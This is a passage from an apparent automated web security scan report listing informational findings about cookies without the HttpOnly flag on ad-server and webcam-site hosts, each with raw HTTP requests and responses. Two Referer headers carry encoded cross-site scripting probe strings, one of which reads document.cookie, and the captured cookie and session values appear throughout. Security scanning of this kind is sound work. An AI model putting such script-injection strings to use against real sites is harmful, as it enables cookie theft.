Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:53 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.490. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:57 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.491. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:32 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.492. http://nl.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=de304g55lx13wkfega5qpc55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=de304g55lx13wkfega5qpc55; path=/; HttpOnly
Set-Cookie: spvdr=vd=172f260c-f292-40e5-922e-4377befca272&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:14 GMT
Connection: close
Content-Length: 17934
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...

11.493. http://nl.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=osjefprzc5csv3ig1lb2mi55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=osjefprzc5csv3ig1lb2mi55; path=/; HttpOnly
Set-Cookie: spvdr=vd=ae572f88-2060-40b2-aba3-4ce30fcd11c6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:15 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pnl=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:15 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.494. http://no.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=aqcwk4afu03wgg45ktqavz45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=aqcwk4afu03wgg45ktqavz45; path=/; HttpOnly
Set-Cookie: spvdr=vd=cb56a9d1-56fd-458b-a829-3574e99ee9f7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 18070
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...

11.495. http://no.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0pnbhzmycjmm1k45emjzeay5; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0pnbhzmycjmm1k45emjzeay5; path=/; HttpOnly
Set-Cookie: spvdr=vd=19138eb1-cd59-48bc-a99d-570e8f866ba1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pno=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:17 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.496. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:00:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4927
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/D
...[SNIP]...

11.497. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services/preview-current-issue?4df85%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ebb520f082cd=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:31:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4934
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle
...[SNIP]...

11.498. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:05:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4540
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/671207635/Middle/
...[SNIP]...

11.499. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

11.500. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

11.501. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

11.502. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run
...[SNIP]...

11.503. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
